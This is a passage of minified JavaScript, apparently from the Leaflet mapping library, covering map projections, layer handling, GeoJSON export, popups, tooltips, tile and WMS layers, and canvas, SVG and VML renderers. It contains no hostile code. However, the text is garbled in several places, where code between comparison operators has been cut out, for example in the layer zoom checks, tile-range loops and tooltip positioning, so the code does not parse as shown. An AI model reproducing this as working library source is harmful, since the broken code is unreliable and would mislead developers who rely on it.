F([gt.lat+y.lat,gt.lng+y.lng])}var No={__proto__:null,simplify:dn,pointToSegmentDistance:_n,closestPointOnSegment:Zo,clipSegment:pn,_getEdgeIntersection:Oe,_getBitCode:Yt,_sqClosestPointOnSegment:me,isFlat:xt,_flat:vn,polylineCenter:gn},vi={project:function(t){return new E(t.lng,t.lat)},unproject:function(t){return new j(t.y,t.x)},bounds:new Q([-180,-90],[180,90])},gi={R:6378137,R_MINOR:6356752314245179e-9,bounds:new Q([-2003750834279e-5,-1549657073972e-5],[2003750834279e-5,1876465623138e-5]),project:function(t){var e=Math.PI/180,i=this.R,n=t.lat*e,o=this.R_MINOR/i,s=Math.sqrt(1-o*o),r=s*Math.sin(n),a=Math.tan(Math.PI/4-n/2)/Math.pow((1-r)/(1+r),s/2);return n=-i*Math.log(Math.max(a,1e-10)),new E(t.lng*e*i,n)},unproject:function(t){for(var e=180/Math.PI,i=this.R,n=this.R_MINOR/i,o=Math.sqrt(1-n*n),s=Math.exp(-t.y/i),r=Math.PI/2-2*Math.atan(s),a=0,u=.1,c;a<15&&Math.abs(u)>1e-7;a++)c=o*Math.sin(r),c=Math.pow((1-c)/(1+c),o/2),u=Math.PI/2-2*Math.atan(s*c)-r,r+=u;return new j(r*e,t.x*e/i)}},Do={__proto__:null,LonLat:vi,Mercator:gi,SphericalMercator:Ve},Ro=l({},Wt,{code:"EPSG:3395",projection:gi,transformation:function(){var t=.5/(Math.PI*gi.R);return re(t,.5,-t,.5)}()}),yn=l({},Wt,{code:"EPSG:4326",projection:vi,transformation:re(1/180,1,-1/180,.5)}),Fo=l({},Zt,{projection:vi,transformation:re(1,0,-1,0),scale:function(t){return Math.pow(2,t)},zoom:function(t){return Math.log(t)/Math.LN2},distance:function(t,e){var i=e.lng-t.lng,n=e.lat-t.lat;return Math.sqrt(i*i+n*n)},infinite:!0});Zt.Earth=Wt,Zt.EPSG3395=Ro,Zt.EPSG3857=qe,Zt.EPSG900913=Gn,Zt.EPSG4326=yn,Zt.Simple=Fo;var Ct=Ht.extend({options:{pane:"overlayPane",attribution:null,bubblingMouseEvents:!0},addTo:function(t){return t.addLayer(this),this},remove:function(){return this.removeFrom(this._map||this._mapToAdd)},removeFrom:function(t){return t&&t.removeLayer(this),this},getPane:function(t){return this._map.getPane(t?this.options[t]||t:this.options.pane)},addInteractiveTarget:function(t){return this._map._targets[g(t)]=this,this},removeInteractiveTarget:function(t){return delete this._map._targets[g(t)],this},getAttribution:function(){return this.options.attribution},_layerAdd:function(t){var e=t.target;if(e.hasLayer(this)){if(this._map=e,this._zoomAnimated=e._zoomAnimated,this.getEvents){var i=this.getEvents();e.on(i,this),this.once("remove",function(){e.off(i,this)},this)}this.onAdd(e),this.fire("add"),e.fire("layeradd",{layer:this})}}});H.include({addLayer:function(t){if(!t._layerAdd)throw new Error("The provided object is not a Layer.");var e=g(t);return this._layers[e]?this:(this._layers[e]=t,t._mapToAdd=this,t.beforeAdd&&t.beforeAdd(this),this.whenReady(t._layerAdd,t),this)},removeLayer:function(t){var e=g(t);return this._layers[e]?(this._loaded&&t.onRemove(this),delete this._layers[e],this._loaded&&(this.fire("layerremove",{layer:t}),t.fire("remove")),t._map=t._mapToAdd=null,this):this},hasLayer:function(t){return g(t)in this._layers},eachLayer:function(t,e){for(var i in this._layers)t.call(e,this._layers[i]);return this},_addLayers:function(t){t=t?q(t)?t:[t]:[];for(var e=0,i=t.length;ethis._layersMaxZoom&&this.setZoom(this._layersMaxZoom),this.options.minZoom===void 0&&this._layersMinZoom&&this.getZoom()=2&&e[0]instanceof j&&e[0].equals(e[i-1])&&e.pop(),e},_setLatLngs:function(t){At.prototype._setLatLngs.call(this,t),xt(this._latlngs)&&(this._latlngs=[this._latlngs])},_defaultShape:function(){return xt(this._latlngs[0])?this._latlngs[0]:this._latlngs[0][0]},_clipPoints:function(){var t=this._renderer._bounds,e=this.options.weight,i=new E(e,e);if(t=new Q(t.min.subtract(i),t.max.add(i)),this._parts=[],!(!this._pxBounds||!this._pxBounds.intersects(t))){if(this.options.noClip){this._parts=this._rings;return}for(var n=0,o=this._rings.length,s;nt.y!=o.y>t.y&&t.x<(o.x-n.x)*(t.y-n.y)/(o.y-n.y)+n.x&&(e=!e);return e||At.prototype._containsPoint.call(this,t,!0)}});function Ko(t,e){return new ie(t,e)}var Bt=It.extend({initialize:function(t,e){k(this,e),this._layers={},t&&this.addData(t)},addData:function(t){var e=q(t)?t:t.features,i,n,o;if(e){for(i=0,n=e.length;i0&&o.push(o[0].slice()),o}function ne(t,e){return t.feature?l({},t.feature,{geometry:e}):De(e)}function De(t){return t.type==="Feature"||t.type==="FeatureCollection"?t:{type:"Feature",properties:{},geometry:t}}var xi={toGeoJSON:function(t){return ne(this,{type:"Point",coordinates:Pi(this.getLatLng(),t)})}};Ze.include(xi),yi.include(xi),Ie.include(xi),At.include({toGeoJSON:function(t){var e=!xt(this._latlngs),i=Ne(this._latlngs,e?1:0,!1,t);return ne(this,{type:(e?"Multi":"")+"LineString",coordinates:i})}}),ie.include({toGeoJSON:function(t){var e=!xt(this._latlngs),i=e&&!xt(this._latlngs[0]),n=Ne(this._latlngs,i?2:e?1:0,!0,t);return e||(n=[n]),ne(this,{type:(i?"Multi":"")+"Polygon",coordinates:n})}}),te.include({toMultiPoint:function(t){var e=[];return this.eachLayer(function(i){e.push(i.toGeoJSON(t).geometry.coordinates)}),ne(this,{type:"MultiPoint",coordinates:e})},toGeoJSON:function(t){var e=this.feature&&this.feature.geometry&&this.feature.geometry.type;if(e==="MultiPoint")return this.toMultiPoint(t);var i=e==="GeometryCollection",n=[];return this.eachLayer(function(o){if(o.toGeoJSON){var s=o.toGeoJSON(t);if(i)n.push(s.geometry);else{var r=De(s);r.type==="FeatureCollection"?n.push.apply(n,r.features):n.push(r)}}}),i?ne(this,{geometries:n,type:"GeometryCollection"}):{type:"FeatureCollection",features:n}}});function xn(t,e){return new Bt(t,e)}var Yo=xn,Re=Ct.extend({options:{opacity:1,alt:"",interactive:!1,crossOrigin:!1,errorOverlayUrl:"",zIndex:1,className:""},initialize:function(t,e,i){this._url=t,this._bounds=it(e),k(this,i)},onAdd:function(){this._image||(this._initImage(),this.options.opacity<1&&this._updateOpacity()),this.options.interactive&&(A(this._image,"leaflet-interactive"),this.addInteractiveTarget(this._image)),this.getPane().appendChild(this._image),this._reset()},onRemove:function(){$(this._image),this.options.interactive&&this.removeInteractiveTarget(this._image)},setOpacity:function(t){return this.options.opacity=t,this._image&&this._updateOpacity(),this},setStyle:function(t){return t.opacity&&this.setOpacity(t.opacity),this},bringToFront:function(){return this._map&&Qt(this._image),this},bringToBack:function(){return this._map&&$t(this._image),this},setUrl:function(t){return this._url=t,this._image&&(this._image.src=t),this},setBounds:function(t){return this._bounds=it(t),this._map&&this._reset(),this},getEvents:function(){var t={zoom:this._reset,viewreset:this._reset};return this._zoomAnimated&&(t.zoomanim=this._animateZoom),t},setZIndex:function(t){return this.options.zIndex=t,this._updateZIndex(),this},getBounds:function(){return this._bounds},getElement:function(){return this._image},_initImage:function(){var t=this._url.tagName==="IMG",e=this._image=t?this._url:U("img");if(A(e,"leaflet-image-layer"),this._zoomAnimated&&A(e,"leaflet-zoom-animated"),this.options.className&&A(e,this.options.className),e.onselectstart=v,e.onmousemove=v,e.onload=_(this.fire,this,"load"),e.onerror=_(this._overlayOnError,this,"error"),(this.options.crossOrigin||this.options.crossOrigin==="")&&(e.crossOrigin=this.options.crossOrigin===!0?"":this.options.crossOrigin),this.options.zIndex&&this._updateZIndex(),t){this._url=e.src;return}e.src=this._url,e.alt=this.options.alt},_animateZoom:function(t){var e=this._map.getZoomScale(t.zoom),i=this._map._latLngBoundsToNewLayerBounds(this._bounds,t.zoom,t.center).min;Gt(this._image,i,e)},_reset:function(){var t=this._image,e=new Q(this._map.latLngToLayerPoint(this._bounds.getNorthWest()),this._map.latLngToLayerPoint(this._bounds.getSouthEast())),i=e.getSize();nt(t,e.min),t.style.width=i.x+"px",t.style.height=i.y+"px"},_updateOpacity:function(){Pt(this._image,this.options.opacity)},_updateZIndex:function(){this._image&&this.options.zIndex!==void 0&&this.options.zIndex!==null&&(this._image.style.zIndex=this.options.zIndex)},_overlayOnError:function(){this.fire("error");var t=this.options.errorOverlayUrl;t&&this._url!==t&&(this._url=t,this._image.src=t)},getCenter:function(){return this._bounds.getCenter()}}),Jo=function(t,e,i){return new Re(t,e,i)},Ln=Re.extend({options:{autoplay:!0,loop:!0,keepAspectRatio:!0,muted:!1,playsInline:!0},_initImage:function(){var t=this._url.tagName==="VIDEO",e=this._image=t?this._url:U("video");if(A(e,"leaflet-image-layer"),this._zoomAnimated&&A(e,"leaflet-zoom-animated"),this.options.className&&A(e,this.options.className),e.onselectstart=v,e.onmousemove=v,e.onloadeddata=_(this.fire,this,"load"),t){for(var i=e.getElementsByTagName("source"),n=[],o=0;o0?n:[e.src];return}q(this._url)||(this._url=[this._url]),!this.options.keepAspectRatio&&Object.prototype.hasOwnProperty.call(e.style,"objectFit")&&(e.style.objectFit="fill"),e.autoplay=!!this.options.autoplay,e.loop=!!this.options.loop,e.muted=!!this.options.muted,e.playsInline=!!this.options.playsInline;for(var s=0;s×',I(n,"click",function(o){ut(o),this.close()},this)}},_updateLayout:function(){var t=this._contentNode,e=t.style;e.width="",e.whiteSpace="nowrap";var i=t.offsetWidth;i=Math.min(i,this.options.maxWidth),i=Math.max(i,this.options.minWidth),e.width=i+1+"px",e.whiteSpace="",e.height="";var n=t.offsetHeight,o=this.options.maxHeight,s="leaflet-popup-scrolled";o&&n>o?(e.height=o+"px",A(t,s)):tt(t,s),this._containerWidth=this._container.offsetWidth},_animateZoom:function(t){var e=this._map._latLngToNewLayerPoint(this._latlng,t.zoom,t.center),i=this._getAnchor();nt(this._container,e.add(i))},_adjustPan:function(){if(this.options.autoPan){if(this._map._panAnim&&this._map._panAnim.stop(),this._autopanning){this._autopanning=!1;return}var t=this._map,e=parseInt(ue(this._container,"marginBottom"),10)||0,i=this._container.offsetHeight+e,n=this._containerWidth,o=new E(this._containerLeft,-i-this._containerBottom);o._add(qt(this._container));var s=t.layerPointToContainerPoint(o),r=Z(this.options.autoPanPadding),a=Z(this.options.autoPanPaddingTopLeft||r),u=Z(this.options.autoPanPaddingBottomRight||r),c=t.getSize(),y=0,C=0;s.x+n+u.x>c.x&&(y=s.x+n-c.x+u.x),s.x-y-a.x<0&&(y=s.x-a.x),s.y+i+u.y>c.y&&(C=s.y+i-c.y+u.y),s.y-C-a.y<0&&(C=s.y-a.y),(y||C)&&(this.options.keepInView&&(this._autopanning=!0),t.fire("autopanstart").panBy([y,C]))}},_getAnchor:function(){return Z(this._source&&this._source._getPopupAnchor?this._source._getPopupAnchor():[0,0])}}),$o=function(t,e){return new Fe(t,e)};H.mergeOptions({closePopupOnClick:!0}),H.include({openPopup:function(t,e,i){return this._initOverlay(Fe,t,e,i).openOn(this),this},closePopup:function(t){return t=arguments.length?t:this._popup,t&&t.close(),this}}),Ct.include({bindPopup:function(t,e){return this._popup=this._initOverlay(Fe,this._popup,t,e),this._popupHandlersAdded||(this.on({click:this._openPopup,keypress:this._onKeyPress,remove:this.closePopup,move:this._movePopup}),this._popupHandlersAdded=!0),this},unbindPopup:function(){return this._popup&&(this.off({click:this._openPopup,keypress:this._onKeyPress,remove:this.closePopup,move:this._movePopup}),this._popupHandlersAdded=!1,this._popup=null),this},openPopup:function(t){return this._popup&&(this instanceof It||(this._popup._source=this),this._popup._prepareOpen(t||this._latlng)&&this._popup.openOn(this._map)),this},closePopup:function(){return this._popup&&this._popup.close(),this},togglePopup:function(){return this._popup&&this._popup.toggle(this),this},isPopupOpen:function(){return this._popup?this._popup.isOpen():!1},setPopupContent:function(t){return this._popup&&this._popup.setContent(t),this},getPopup:function(){return this._popup},_openPopup:function(t){if(!(!this._popup||!this._map)){Kt(t);var e=t.layer||t.target;if(this._popup._source===e&&!(e instanceof Vt)){this._map.hasLayer(this._popup)?this.closePopup():this.openPopup(t.latlng);return}this._popup._source=e,this.openPopup(t.latlng)}},_movePopup:function(t){this._popup.setLatLng(t.latlng)},_onKeyPress:function(t){t.originalEvent.keyCode===13&&this._openPopup(t)}});var He=zt.extend({options:{pane:"tooltipPane",offset:[0,0],direction:"auto",permanent:!1,sticky:!1,opacity:.9},onAdd:function(t){zt.prototype.onAdd.call(this,t),this.setOpacity(this.options.opacity),t.fire("tooltipopen",{tooltip:this}),this._source&&(this.addEventParent(this._source),this._source.fire("tooltipopen",{tooltip:this},!0))},onRemove:function(t){zt.prototype.onRemove.call(this,t),t.fire("tooltipclose",{tooltip:this}),this._source&&(this.removeEventParent(this._source),this._source.fire("tooltipclose",{tooltip:this},!0))},getEvents:function(){var t=zt.prototype.getEvents.call(this);return this.options.permanent||(t.preclick=this.close),t},_initLayout:function(){var t="leaflet-tooltip",e=t+" "+(this.options.className||"")+" leaflet-zoom-"+(this._zoomAnimated?"animated":"hide");this._contentNode=this._container=U("div",e),this._container.setAttribute("role","tooltip"),this._container.setAttribute("id","leaflet-tooltip-"+g(this))},_updateLayout:function(){},_adjustPan:function(){},_setPosition:function(t){var e,i,n=this._map,o=this._container,s=n.latLngToContainerPoint(n.getCenter()),r=n.layerPointToContainerPoint(t),a=this.options.direction,u=o.offsetWidth,c=o.offsetHeight,y=Z(this.options.offset),C=this._getAnchor();a==="top"?(e=u/2,i=c):a==="bottom"?(e=u/2,i=0):a==="center"?(e=u/2,i=c/2):a==="right"?(e=0,i=c/2):a==="left"?(e=u,i=c/2):r.xthis.options.maxZoom||in?this._retainParent(o,s,r,n):!1)},_retainChildren:function(t,e,i,n){for(var o=2*t;o<2*t+2;o++)for(var s=2*e;s<2*e+2;s++){var r=new E(o,s);r.z=i+1;var a=this._tileCoordsToKey(r),u=this._tiles[a];if(u&&u.active){u.retain=!0;continue}else u&&u.loaded&&(u.retain=!0);i+1this.options.maxZoom||this.options.minZoom!==void 0&&o1){this._setView(t,i);return}for(var C=o.min.y;C<=o.max.y;C++)for(var N=o.min.x;N<=o.max.x;N++){var _t=new E(N,C);if(_t.z=this._tileZoom,!!this._isValidTile(_t)){var at=this._tiles[this._tileCoordsToKey(_t)];at?at.current=!0:r.push(_t)}}if(r.sort(function(gt,se){return gt.distanceTo(s)-se.distanceTo(s)}),r.length!==0){this._loading||(this._loading=!0,this.fire("loading"));var Lt=document.createDocumentFragment();for(N=0;Ni.max.x)||!e.wrapLat&&(t.yi.max.y))return!1}if(!this.options.bounds)return!0;var n=this._tileCoordsToBounds(t);return it(this.options.bounds).overlaps(n)},_keyToBounds:function(t){return this._tileCoordsToBounds(this._keyToTileCoords(t))},_tileCoordsToNwSe:function(t){var e=this._map,i=this.getTileSize(),n=t.scaleBy(i),o=n.add(i),s=e.unproject(n,t.z),r=e.unproject(o,t.z);return[s,r]},_tileCoordsToBounds:function(t){var e=this._tileCoordsToNwSe(t),i=new vt(e[0],e[1]);return this.options.noWrap||(i=this._map.wrapLatLngBounds(i)),i},_tileCoordsToKey:function(t){return t.x+":"+t.y+":"+t.z},_keyToTileCoords:function(t){var e=t.split(":"),i=new E(+e[0],+e[1]);return i.z=+e[2],i},_removeTile:function(t){var e=this._tiles[t];e&&($(e.el),delete this._tiles[t],this.fire("tileunload",{tile:e.el,coords:this._keyToTileCoords(t)}))},_initTile:function(t){A(t,"leaflet-tile");var e=this.getTileSize();t.style.width=e.x+"px",t.style.height=e.y+"px",t.onselectstart=v,t.onmousemove=v,T.ielt9&&this.options.opacity<1&&Pt(t,this.options.opacity)},_addTile:function(t,e){var i=this._getTilePos(t),n=this._tileCoordsToKey(t),o=this.createTile(this._wrapCoords(t),_(this._tileReady,this,t));this._initTile(o),this.createTile.length<2&&X(_(this._tileReady,this,t,null,o)),nt(o,i),this._tiles[n]={el:o,coords:t,current:!0},e.appendChild(o),this.fire("tileloadstart",{tile:o,coords:t})},_tileReady:function(t,e,i){e&&this.fire("tileerror",{error:e,tile:i,coords:t});var n=this._tileCoordsToKey(t);i=this._tiles[n],i&&(i.loaded=+new Date,this._map._fadeAnimated?(Pt(i.el,0),dt(this._fadeFrame),this._fadeFrame=X(this._updateOpacity,this)):(i.active=!0,this._pruneTiles()),e||(A(i.el,"leaflet-tile-loaded"),this.fire("tileload",{tile:i.el,coords:t})),this._noTilesToLoad()&&(this._loading=!1,this.fire("load"),T.ielt9||!this._map._fadeAnimated?X(this._pruneTiles,this):setTimeout(_(this._pruneTiles,this),250)))},_getTilePos:function(t){return t.scaleBy(this.getTileSize()).subtract(this._level.origin)},_wrapCoords:function(t){var e=new E(this._wrapX?S(t.x,this._wrapX):t.x,this._wrapY?S(t.y,this._wrapY):t.y);return e.z=t.z,e},_pxBoundsToTileRange:function(t){var e=this.getTileSize();return new Q(t.min.unscaleBy(e).floor(),t.max.unscaleBy(e).ceil().subtract([1,1]))},_noTilesToLoad:function(){for(var t in this._tiles)if(!this._tiles[t].loaded)return!1;return!0}});function is(t){return new ve(t)}var oe=ve.extend({options:{minZoom:0,maxZoom:18,subdomains:"abc",errorTileUrl:"",zoomOffset:0,tms:!1,zoomReverse:!1,detectRetina:!1,crossOrigin:!1,referrerPolicy:!1},initialize:function(t,e){this._url=t,e=k(this,e),e.detectRetina&&T.retina&&e.maxZoom>0?(e.tileSize=Math.floor(e.tileSize/2),e.zoomReverse?(e.zoomOffset--,e.minZoom=Math.min(e.maxZoom,e.minZoom+1)):(e.zoomOffset++,e.maxZoom=Math.max(e.minZoom,e.maxZoom-1)),e.minZoom=Math.max(0,e.minZoom)):e.zoomReverse?e.minZoom=Math.min(e.maxZoom,e.minZoom):e.maxZoom=Math.max(e.minZoom,e.maxZoom),typeof e.subdomains=="string"&&(e.subdomains=e.subdomains.split("")),this.on("tileunload",this._onTileRemove)},setUrl:function(t,e){return this._url===t&&e===void 0&&(e=!0),this._url=t,e||this.redraw(),this},createTile:function(t,e){var i=document.createElement("img");return I(i,"load",_(this._tileOnLoad,this,e,i)),I(i,"error",_(this._tileOnError,this,e,i)),(this.options.crossOrigin||this.options.crossOrigin==="")&&(i.crossOrigin=this.options.crossOrigin===!0?"":this.options.crossOrigin),typeof this.options.referrerPolicy=="string"&&(i.referrerPolicy=this.options.referrerPolicy),i.alt="",i.src=this.getTileUrl(t),i},getTileUrl:function(t){var e={r:T.retina?"@2x":"",s:this._getSubdomain(t),x:t.x,y:t.y,z:this._getZoomForUrl()};if(this._map&&!this._map.options.crs.infinite){var i=this._globalTileRange.max.y-t.y;this.options.tms&&(e.y=i),e["-y"]=i}return rt(this._url,l(e,this.options))},_tileOnLoad:function(t,e){T.ielt9?setTimeout(_(t,this,null,e),0):t(null,e)},_tileOnError:function(t,e,i){var n=this.options.errorTileUrl;n&&e.getAttribute("src")!==n&&(e.src=n),t(i,e)},_onTileRemove:function(t){t.tile.onload=null},_getZoomForUrl:function(){var t=this._tileZoom,e=this.options.maxZoom,i=this.options.zoomReverse,n=this.options.zoomOffset;return i&&(t=e-t),t+n},_getSubdomain:function(t){var e=Math.abs(t.x+t.y)%this.options.subdomains.length;return this.options.subdomains[e]},_abortLoading:function(){var t,e;for(t in this._tiles)if(this._tiles[t].coords.z!==this._tileZoom&&(e=this._tiles[t].el,e.onload=v,e.onerror=v,!e.complete)){e.src=G;var i=this._tiles[t].coords;$(e),delete this._tiles[t],this.fire("tileabort",{tile:e,coords:i})}},_removeTile:function(t){var e=this._tiles[t];if(e)return e.el.setAttribute("src",G),ve.prototype._removeTile.call(this,t)},_tileReady:function(t,e,i){if(!(!this._map||i&&i.getAttribute("src")===G))return ve.prototype._tileReady.call(this,t,e,i)}});function Mn(t,e){return new oe(t,e)}var Cn=oe.extend({defaultWmsParams:{service:"WMS",request:"GetMap",layers:"",styles:"",format:"image/jpeg",transparent:!1,version:"1.1.1"},options:{crs:null,uppercase:!1},initialize:function(t,e){this._url=t;var i=l({},this.defaultWmsParams);for(var n in e)n in this.options||(i[n]=e[n]);e=k(this,e);var o=e.detectRetina&&T.retina?2:1,s=this.getTileSize();i.width=s.x*o,i.height=s.y*o,this.wmsParams=i},onAdd:function(t){this._crs=this.options.crs||t.options.crs,this._wmsVersion=parseFloat(this.wmsParams.version);var e=this._wmsVersion>=1.3?"crs":"srs";this.wmsParams[e]=this._crs.code,oe.prototype.onAdd.call(this,t)},getTileUrl:function(t){var e=this._tileCoordsToNwSe(t),i=this._crs,n=pt(i.project(e[0]),i.project(e[1])),o=n.min,s=n.max,r=(this._wmsVersion>=1.3&&this._crs===yn?[o.y,o.x,s.y,s.x]:[o.x,o.y,s.x,s.y]).join(","),a=oe.prototype.getTileUrl.call(this,t);return a+ft(this.wmsParams,a,this.options.uppercase)+(this.options.uppercase?"&BBOX=":"&bbox=")+r},setParams:function(t,e){return l(this.wmsParams,t),e||this.redraw(),this}});function ns(t,e){return new Cn(t,e)}oe.WMS=Cn,Mn.wms=ns;var Nt=Ct.extend({options:{padding:.1},initialize:function(t){k(this,t),g(this),this._layers=this._layers||{}},onAdd:function(){this._container||(this._initContainer(),A(this._container,"leaflet-zoom-animated")),this.getPane().appendChild(this._container),this._update(),this.on("update",this._updatePaths,this)},onRemove:function(){this.off("update",this._updatePaths,this),this._destroyContainer()},getEvents:function(){var t={viewreset:this._reset,zoom:this._onZoom,moveend:this._update,zoomend:this._onZoomEnd};return this._zoomAnimated&&(t.zoomanim=this._onAnimZoom),t},_onAnimZoom:function(t){this._updateTransform(t.center,t.zoom)},_onZoom:function(){this._updateTransform(this._map.getCenter(),this._map.getZoom())},_updateTransform:function(t,e){var i=this._map.getZoomScale(e,this._zoom),n=this._map.getSize().multiplyBy(.5+this.options.padding),o=this._map.project(this._center,e),s=n.multiplyBy(-i).add(o).subtract(this._map._getNewPixelOrigin(t,e));T.any3d?Gt(this._container,s,i):nt(this._container,s)},_reset:function(){this._update(),this._updateTransform(this._center,this._zoom);for(var t in this._layers)this._layers[t]._reset()},_onZoomEnd:function(){for(var t in this._layers)this._layers[t]._project()},_updatePaths:function(){for(var t in this._layers)this._layers[t]._update()},_update:function(){var t=this.options.padding,e=this._map.getSize(),i=this._map.containerPointToLayerPoint(e.multiplyBy(-t)).round();this._bounds=new Q(i,i.add(e.multiplyBy(1+t*2)).round()),this._center=this._map.getCenter(),this._zoom=this._map.getZoom()}}),Sn=Nt.extend({options:{tolerance:0},getEvents:function(){var t=Nt.prototype.getEvents.call(this);return t.viewprereset=this._onViewPreReset,t},_onViewPreReset:function(){this._postponeUpdatePaths=!0},onAdd:function(){Nt.prototype.onAdd.call(this),this._draw()},_initContainer:function(){var t=this._container=document.createElement("canvas");I(t,"mousemove",this._onMouseMove,this),I(t,"click dblclick mousedown mouseup contextmenu",this._onClick,this),I(t,"mouseout",this._handleMouseOut,this),t._leaflet_disable_events=!0,this._ctx=t.getContext("2d")},_destroyContainer:function(){dt(this._redrawRequest),delete this._ctx,$(this._container),K(this._container),delete this._container},_updatePaths:function(){if(!this._postponeUpdatePaths){var t;this._redrawBounds=null;for(var e in this._layers)t=this._layers[e],t._update();this._redraw()}},_update:function(){if(!(this._map._animatingZoom&&this._bounds)){Nt.prototype._update.call(this);var t=this._bounds,e=this._container,i=t.getSize(),n=T.retina?2:1;nt(e,t.min),e.width=n*i.x,e.height=n*i.y,e.style.width=i.x+"px",e.style.height=i.y+"px",T.retina&&this._ctx.scale(2,2),this._ctx.translate(-t.min.x,-t.min.y),this.fire("update")}},_reset:function(){Nt.prototype._reset.call(this),this._postponeUpdatePaths&&(this._postponeUpdatePaths=!1,this._updatePaths())},_initPath:function(t){this._updateDashArray(t),this._layers[g(t)]=t;var e=t._order={layer:t,prev:this._drawLast,next:null};this._drawLast&&(this._drawLast.next=e),this._drawLast=e,this._drawFirst=this._drawFirst||this._drawLast},_addPath:function(t){this._requestRedraw(t)},_removePath:function(t){var e=t._order,i=e.next,n=e.prev;i?i.prev=n:this._drawLast=n,n?n.next=i:this._drawFirst=i,delete t._order,delete this._layers[g(t)],this._requestRedraw(t)},_updatePath:function(t){this._extendRedrawBounds(t),t._project(),t._update(),this._requestRedraw(t)},_updateStyle:function(t){this._updateDashArray(t),this._requestRedraw(t)},_updateDashArray:function(t){if(typeof t.options.dashArray=="string"){var e=t.options.dashArray.split(/[, ]+/),i=[],n,o;for(o=0;o')}}catch{}return function(t){return document.createElement("<"+t+' xmlns="urn:schemas-microsoft.com:vml" class="lvml">')}}(),os={_initContainer:function(){this._container=U("div","leaflet-vml-container")},_update:function(){this._map._animatingZoom||(Nt.prototype._update.call(this),this.fire("update"))},_initPath:function(t){var e=t._container=ge("shape");A(e,"leaflet-vml-shape "+(this.options.className||"")),e.coordsize="1 1",t._path=ge("path"),e.appendChild(t._path),this._updateStyle(t),this._layers[g(t)]=t},_addPath:function(t){var e=t._container;this._container.appendChild(e),t.options.interactive&&t.addInteractiveTarget(e)},_removePath:function(t){var e=t._container;$(e),t.removeInteractiveTarget(e),delete this._layers[g(t)]},_updateStyle:function(t){var e=t._stroke,i=t._fill,n=t.options,o=t._container;o.stroked=!!n.stroke,o.filled=!!n.fill,n.stroke?(e||(e=t._stroke=ge("stroke")),o.appendChild(e),e.weight=n.weight+"px",e.color=n.color,e.opacity=n.opacity,n.dashArray?e.dashStyle=q(n.dashArray)?n.dashArray.join(" "):n.dashArray.replace(/( *, *)/g," "):e.dashStyle="",e.endcap=n.lineCap.replace("butt","flat"),e.joinstyle=n.lineJoin):e&&(o.removeChild(e),t._stroke=null),n.fill?(i||(i=t._fill=ge("fill")),o.appendChild(i),i.color=n.fillColor||n.color,i.opacity=n.fillOpacity):i&&(o.removeChild(i),t._fill=null)},_updateCircle:function(t){var e=t._point.round(),i=Math.round(t._radius),n=Math.round(t._radiusY||i);this._setPath(t,t._empty()?"M0 0":"AL "+e.x+","+e.y+" "+i+","+n+" 0,"+65535*360)},_setPath:function(t,e){t._path.v=e},_bringToFront:function(t){Qt(t._container)},_bringToBack:function(t){$t(t._container)}},We=T.vml?ge:Oi,ye=Nt.extend({_initContainer:function(){this._container=We("svg"),this._container.setAttribute("pointer-events","none"),this._rootGroup=We("g"),this._container.appendChild(this._rootGroup)},_destroyContainer:function(){$(this._container),K(this._container),delete this._container,delete this._rootGroup,delete this._svgSize},_update:function(){if(!(this._map._animatingZoom&&this._bounds)){Nt.prototype._update.call(this);var t=this._bounds,e=t.getSize(),i=this._container;(!this._svgSize||!this._svgSize.equals(e))&&(this._svgSize=e,i.setAttribute("width",e.x),i.setAttribute("height",e.y)),nt(i,t.min),i.setAttribute("viewBox",[t.min.x,t.min.y,e.x,e.y].join(" ")),this.fire("update")}},_initPath:function(t){var e=t._path=We("path");t.options.className&&A(e,t.options.className),t.options.interactive&&A(e,"leaflet-interactive"),this._updateStyle(t),this._layers[g(t)]=t},_addPath:function(t){this._rootGroup||this._initContainer(),this._rootGroup.appendChild(t._path),t.addInteractiveTarget(t._path)},_removePath:function(t){$(t._path),t.removeInteractiveTarget(t._path),delete this._layers[g(t)]},_updatePath:function(t){t._project(),t._update()},_updateStyle:function(t){var e=t._path,i=t.options;e&&(i.stroke?(e.setAttribute("stroke",i.color),e.setAttribute("stroke-opacity",i.opacity),e.setAttribute("stroke-width",i.weight),e.setAttribute("stroke-linecap",i.lineCap),e.setAttribute("stroke-linejoin",i.lineJoin),i.dashArray?e.setAttribute("stroke-dasharray",i.dashArray):e.removeAttribute("stroke-dasharray"),i.dashOffset?e.setAttribute("stroke-dashoffset",i.dashOffset):e.removeAttribute("stroke-dashoffset")):e.setAttribute("stroke","none"),i.fill?(e.setAttribute("fill",i.fillColor||i.color),e.setAttribute("fill-opacity",i.fillOpacity),e.setAttribute("fill-rule",i.fillRule||"evenodd")):e.setAttribute("fill","none"))},_updatePoly:function(t,e){this._setPath(t,Zi(t._parts,e))},_updateCircle:function(t){var e=t._point,i=Math.max(Math.round(t._radius),1),n=Math.max(Math.round(t._radiusY),1)||i,o="a"+i+","+n+" 0 1,0 ",s=t._empty()?"M0 0":"M"+(e.x-i)+","+e.y+o+i*2+",0 "+o+-i*2+",0 ";this._setPath(t,s)},_setPath:function(t,e){t._path.setAttribute("d",e)},_bringToFront:function(t){Qt(t._path)},_bringToBack:function(t){$t(t._path)}});T.vml&&ye.include(os);function En(t){return T.svg||T.vml?new ye(t):null}H.include({getRenderer:function(t){var e=t.options.renderer||this._getPaneRenderer(t.options.pane)||this.options.renderer||this._renderer;return e||(e=this._renderer=this._createRenderer()),this.hasLayer(e)||this.addLayer(e),e},_getPaneRenderer:function(t){if(t==="overlayPane"||t===void 0)return!1;var e=this._paneRenderers[t];return e===void 0&&(e=this._createRenderer({pane:t}),this._paneRenderers[t]=e),e},_createRenderer:function(t){return this.options.preferCanvas&&kn(t)||En(t)}});var zn=ie.extend({initialize:function(t,e){ie.prototype.initialize.call(this,this._boundsToLatLngs(t),e)},setBounds:function(t){return this.setLatLngs(this._boundsToLatLngs(t))},_boundsToLatLngs:function(t){return t=it(t),[t.getSouthWest(),t.getNorthWest(),t.getNorthEast(),t.getSouthEast()]}});function ss(t,e){return new zn(t,e)}ye.create=We,ye.pointsToPath=Zi,Bt.geometryToLayer=Ae,Bt.coordsToLatLng=wi,Bt.coordsToLatLngs=Be,Bt.latLngToCoords=Pi,Bt.latLngsToCoords=Ne,Bt.getFeature=ne,Bt.asFeature=De,H.mergeOptions({boxZoom:!0});var On=Et.extend({initialize:function(t){this._map=t,this._container=t._container,this._pane=t._panes.overlayPane,this._resetStateTimeout=0,t.on("unload",this._destroy,this)},addHooks:function(){I(this._container,"mousedown",this._onMouseDown,this)},removeHooks:function(){K(this._container,"mousedown",this._onMouseDown,this)},moved:function(){return this._moved},_destroy:function(){$(this._pane),delete 